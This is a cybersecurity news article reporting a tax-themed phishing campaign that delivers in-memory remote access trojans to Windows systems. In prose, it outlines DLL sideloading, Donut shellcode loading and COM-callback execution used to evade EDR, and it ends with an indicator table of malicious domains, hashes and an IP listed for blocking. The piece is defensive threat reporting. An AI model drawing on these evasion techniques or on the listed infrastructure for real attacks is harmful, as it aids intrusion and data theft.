Tax Phishing Emails Deliver In-Memory Malware to Windows Systems - gbhackers.com

cyber securityCyber Security NewsMalware 4 min.Read Tax Phishing Emails Deliver In-Memory Malware to Windows Systems By Mayura Kathir June 10, 2026 Share Facebook Twitter Pinterest WhatsApp Cybercriminals are leveraging tax-themed phishing emails to deploy sophisticated in-memory malware on Windows systems, bypassing traditional disk-based detection mechanisms. The attack cascade begins when victims receive phishing emails containing malicious attachments disguised as official tax documents, W-2 forms, or rejected tax form notifications from legitimate entities like Intuit QuickBooks or HM Revenue & Customs. When opened, these attachments trigger a multi-stage execution chain that never writes malicious code to disk. Instead, attackers leverage legitimate Windows administration tools including PowerShell, mshta.exe, and Windows Management Instrumentation to execute shellcode loaders entirely in memory. The most recent campaigns attributed to threat actor Silver Fox specifically target Indian organizations and individuals, employing highly convincing tax-themed lures that mimic official communications from tax authorities. The attack begins with a PDF attachment masquerading as an official tax document that redirects victims to a website serving a ZIP archive. Inside, an NSIS installer drops a legitimate signed binary alongside a malicious DLL, which loads through DLL hijacking to bypass security controls. CYFIRMA said in a report shared with GBhackers, latest campaigns, detected in early 2026, involve attackers impersonating tax agencies and financial organizations to steal sensitive information while delivering advanced remote access trojans entirely within system memory. The malware further protects execution using LLVM-based Control Flow Flattening (CFF) and establishes persistent WebSocket-based Command-and-Control (C2) communication through HTTP protocol upgrades. Attack Chain (Source : CYFIRMA). The malicious DLL performs anti-debugging checks, disables Windows Update services, decrypts an embedded payload, and uses process injection to compromise legitimate Windows processes. Tax Phishing Emails Deliver In-Memory A shellcode loader generated via Donut wraps and executes the final payload entirely in memory, avoiding disk artifacts that antivirus solutions typically scan. The ultimate payload is a modular remote access trojan enabling keylogging, remote shell access, file transfer, and dynamic plugin execution. In-memory malware, also called fileless malware, represents a critical evolution in attack techniques because it executes exclusively in system memory without creating persistent files on disk. The static analysis identified SbieDll.dll as a 64-bit Portable Executable Dynamic Link Library (PE64 DLL) compiled for AMD64 architecture using Microsoft Visual C/C++ with Visual Studio 2022. Static analysis results of SbieDll.dll using Detect It Easy (DiE) highlighting PE64 DLL architecture, packing and obfuscation indicators (Source : CYFIRMA). This approach leverages living-off-the-land techniques where attackers use legitimate system tools to attain persistence through registry run keys and startup folders, making detection exceptionally challenging for security teams. Proofpoint’s 2025 tax season report identified over 100 malicious operations impersonating tax agencies, with campaigns delivering Rhadamanthys malware, zgRAT, MetaStealer, XWorm, AsyncRAT, and VenomRAT. Another campaign distributed Remcos RAT using fake tax documents, PowerShell scripts, and Microsoft shortcut files that silently execute malicious HTA files through mshta.exe. Rather than creating a new thread through standard Windows APIs that are frequently monitored by Endpoint Detection and Response (EDR) solutions, the malware appears to execute shellcode through a COM IContextCallback::ContextCallback handler. COM callback registration and execution handling logic (Source : CYFIRMA). The Silver Fox campaign demonstrates multi-tier failover command-and-control communication with configurable beaconing intervals to reduce detection, while persisting through registry-based storage of components. This campaign underscores nation-state threat actors combining social engineering with advanced multi-stage malware techniques targeting specific regional audiences. Security teams should prioritize detection of anomalous execution patterns including unusual PowerShell usage, mshta.exe downloads, and DLL hijacking attempts. Organizations must educate employees on recognizing phishing tactics during tax seasons, as these lures exploit urgency and fear regarding financial penalties. Implementing application whitelisting, monitoring for living-off-the-land techniques, and deploying memory-scanning capabilities provide critical defense against these evasive attacks. The effectiveness of tax-themed attacks stems from victims expecting communications from authoritative organizations or worrying about fines for incorrectly submitted information. As threat intelligence adapts to phishing-as-a-service platforms like RaccoonO365 deploying Remcos RATs and BruteRatel C4, defenders must evolve detection strategies beyond traditional file-based antivirus approaches. INDICATORS OF COMPROMISE (IOCs) S. No Indicators of Compromise (IOCs) Type Remarks 1 guhxmg.com Domain Block 2 naiqja.icu Domain Block 3 zh-welcome-1xbet.com Domain Block 4 d.pc-weide.com Subdomain Block 5 taxations.cn-web-okooo.com Subdomain Block 6 taxations.indiagov.it.com Subdomain Block 7 zhengfu666.com Domain Block 8 asdqxcdsa.icu Domain Block 9 appradarr.cc Domain Block 10 ws4962.com Domain Block 11 185b7a487316454da04e9cc0fe6eb370bb2955cf6096fe3e8c02c46f8989ba37 SHA-256 Block 12 4c9061a07d667bf7dd6f597a43a8552af2f4277b7be06d6ea138abdb668d6a49 SHA-256 Block 13 949acbe543fc244ffbc981ea169067da7c5792af3c3d19b2c31b3d7e19106880 SHA-256 Block 14 be31a63cad112723178289968ad6f93a576c5a7984099c42eec3521cdf6e5fc0 SHA-256 Block 15 7d87a86dbd2379ef2516c99258137cd9c25ca19c48aeb096c5332c02fcbf16d0 SHA-256 Block 16 43.128.54.184 IP Address Block Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google. Tags cyber security Cyber Security News Malware Mayura Kathirhttps://gbhackers.com/ Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more. Hot this week Infosec- Resources How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities June 4, 2023 1 What is Deep Web The deep web, invisible web, or... SOC Architecture How to Build and Run a Security Operations Center (SOC Guide) – 2023 June 3, 2023 12 Today’s Cyber security operations center (CSOC) should have everything... Cyber Security News Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component October 18, 2023 0 TeamViewer's popularity and remote access capabilities make it an... Checklist Web Server Penetration Testing Checklist – 2026 January 6, 2026 0 Web server pentesting is performed under three significant categories: identity,... Infosec- Resources ATM Penetration Testing – Advanced Testing Methods to Find The Vulnerabilities June 4, 2023 4 ATM Penetration testing, Hackers have found different approaches to... Topics AcquisitionAdobeAdwareAIAmazonAmazon AWSAMDAndroidAnti VirusAntimalwareANY RUNApacheAPIAppleAPTArtificial IntelligenceAvastAWSAzureBackdoorBitcoinBluetoothBotnetBrowserBuffer over flowBug BountyBusinessChatbotsChatGPTChecklistChromeCiscoCISOCISO AdvisoryCloudCloud SecurityCloudflareComputer SecurityCourseCPUCross site ScriptingcryptocurrencyCryptocurrency hackCVE/vulnerabilityCyber AdvisoryCyber AICyber AttackCyber Crimecyber securityCyber security CourseCyber Security NewsCyber Security ResourcesDark WebData BreachData GovernanceDDOSDealsDeepSeekDiscordDNSDos AttackDriveDropboxEducationEmailEmail SecurityEthical HackingExploitExploitation ToolsExtratorrentsFACEBOOKFeaturedFirefoxFirefox NewsFirewallForensics ToolsgameGenAIGitHubGitLabGmailGoogleGoogle dorksGovernanceGRCHacking BooksHacksHardware HackingHBOHTMLHTTPIBMIISIncident ResponseInformation GatheringInformation Security RisksInfosec- ResourcesInsider ThreatsInstagramIntelMore CVE/vulnerability New Windows CTF 0-Day Vulnerability Lets Attackers Gain Elevated Privileges 0 Microsoft has disclosed a new zero-day vulnerability in the... cyber security Hackers Use Fake Utility Downloads to Deploy ScreenConnect and Cryptominers 0 An active cryptojacking campaign in which malicious download sites... CVE/vulnerability CISA Issues Alert on Actively Exploited Google Chromium Zero-Day Flaw 0 CISA has issued a new warning about an actively... cyber security Malicious npm Package ‘dbmux’ Targets Developers 0 Malware was discovered in the npm package dbmux. Any... Cyber Security News Windows BitLocker 0-Day Flaw Enables Security Feature Bypass Attacks 0 Microsoft has disclosed a newly identified zero-day vulnerability in... Cyber Security News Windows Defender Zero-Day “RoguePlanet” Lets Attackers Gain SYSTEM Privileges 0 A newly disclosed zero-day vulnerability dubbed “RoguePlanet” is affecting... cyber security OpenClaw AI Agent Leaks Credentials in Phishing Simulation 0 Autonomous email agents can become high‑impact phishing victims, leaking... Cyber Security News Microsoft Patch Tuesday June 2026 Fixes 198 Vulnerabilities, Including 3 Zero-Days 0 Microsoft’s June 2026 Patch Tuesday fixes 198 vulnerabilities across... Related Articles New Windows CTF 0-Day Vulnerability Lets Attackers Gain Elevated Privileges CVE/vulnerability June 10, 2026 Hackers Use Fake Utility Downloads to Deploy ScreenConnect and Cryptominers cyber security June 10, 2026 CISA Issues Alert on Actively Exploited Google Chromium Zero-Day Flaw CVE/vulnerability June 10, 2026 Malicious npm Package ‘dbmux’ Targets Developers cyber security June 10, 2026 Windows BitLocker 0-Day Flaw Enables Security Feature Bypass Attacks Cyber Security News June 10, 2026 Recent News New Windows CTF 0-Day Vulnerability Lets Attackers Gain Elevated Privileges Divya - June 10, 2026 Hackers Use Fake Utility Downloads to Deploy ScreenConnect and Cryptominers Mayura Kathir - June 10, 2026 CISA Issues Alert on Actively Exploited Google Chromium Zero-Day Flaw Divya - June 10, 2026 Malicious npm Package ‘dbmux’ Targets Developers Mayura Kathir - June 10, 2026 Windows BitLocker 0-Day Flaw Enables Security Feature Bypass Attacks Divya - June 10, 2026 Windows Defender Zero-Day “RoguePlanet” Lets Attackers Gain SYSTEM Privileges Divya - June 10, 2026